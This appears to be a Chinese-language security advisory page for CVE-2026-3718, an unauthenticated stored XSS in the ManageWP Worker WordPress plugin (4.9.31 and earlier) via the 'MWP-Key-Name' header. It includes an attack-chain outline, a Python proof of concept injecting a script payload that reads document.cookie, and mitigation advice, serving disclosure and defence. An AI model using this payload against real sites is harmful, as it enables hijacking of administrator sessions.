IPBUF安全漏洞报告
English
CVE-2026-3718 CVSS 7.2 高危

CVE-2026-3718 ManageWP Worker插件存储型XSS漏洞

披露日期: 2026-05-14
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-3718
漏洞类型
存储型跨站脚本攻击 (Stored XSS)
CVSS评分
7.2 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
ManageWP Worker Plugin (WordPress)

相关标签

Stored XSSWordPressManageWP WorkerCVE-2026-3718Web Security无需认证

漏洞概述

WordPress ManageWP Worker插件在4.9.31及之前版本中存在存储型XSS漏洞。该漏洞源于对'MWP-Key-Name' HTTP请求头值的输入清理和输出转义不足。未经身份验证的攻击者可利用此漏洞注入任意Web脚本。当管理员访问带有调试参数的插件连接管理页面时,恶意脚本将执行,可能导致管理员会话劫持。

技术细节

该漏洞属于存储型跨站脚本攻击(Stored XSS),其根本原因在于ManageWP Worker插件未能正确过滤和转义HTTP请求头中的'MWP-Key-Name'字段。攻击者无需进行身份认证,即可向受影响的WordPress站点发送特制的恶意HTTP请求,将JavaScript代码注入到该请求头中。由于插件后端在处理连接管理功能时,会将该头信息持久化存储,并在管理后台的特定页面(即带有调试参数的连接管理页面)中直接回显。一旦管理员访问该特定页面,存储在服务器端的恶意脚本便会在管理员浏览器的上下文中解析执行。由于是在管理员会话中执行,攻击者可借此利用管理员的权限执行敏感操作,如窃取Cookie凭证、修改后台设置或植入后门,从而完全控制WordPress站点。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描目标WordPress站点,检测是否安装了ManageWP Worker插件及其版本号。
STEP 2
2. 漏洞利用
攻击者向站点发送特制的HTTP请求,在'MWP-Key-Name'请求头中注入恶意JavaScript代码。
STEP 3
3. 恶意代码存储
由于插件未对输入进行充分过滤,恶意载荷被存储在服务器端的数据库或日志中。
STEP 4
4. 触发漏洞
当站点管理员登录后台,并访问带有调试参数的插件连接管理页面时,插件会读取并回显存储的头信息。
STEP 5
5. 执行攻击
恶意脚本在管理员浏览器中执行,攻击者可窃取Session ID或利用管理员权限进行进一步操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL configuration target_url = "http://example.com/wp-admin/admin-ajax.php" # The vulnerable header 'MWP-Key-Name' containing the XSS payload # This payload will be stored and executed when an admin views the debug page headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "MWP-Key-Name": ""><script>alert(document.cookie);</script>" } # Sending the payload try: response = requests.get(target_url, headers=headers, timeout=5) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check if the script is stored in the database.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

ManageWP Worker Plugin <= 4.9.31

防御指南

临时缓解措施
如果无法立即升级插件,建议暂时禁用ManageWP Worker插件以阻断攻击链。同时,管理员应避免在不安全的网络环境下访问管理后台,并检查连接管理页面是否存在异常脚本执行迹象。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表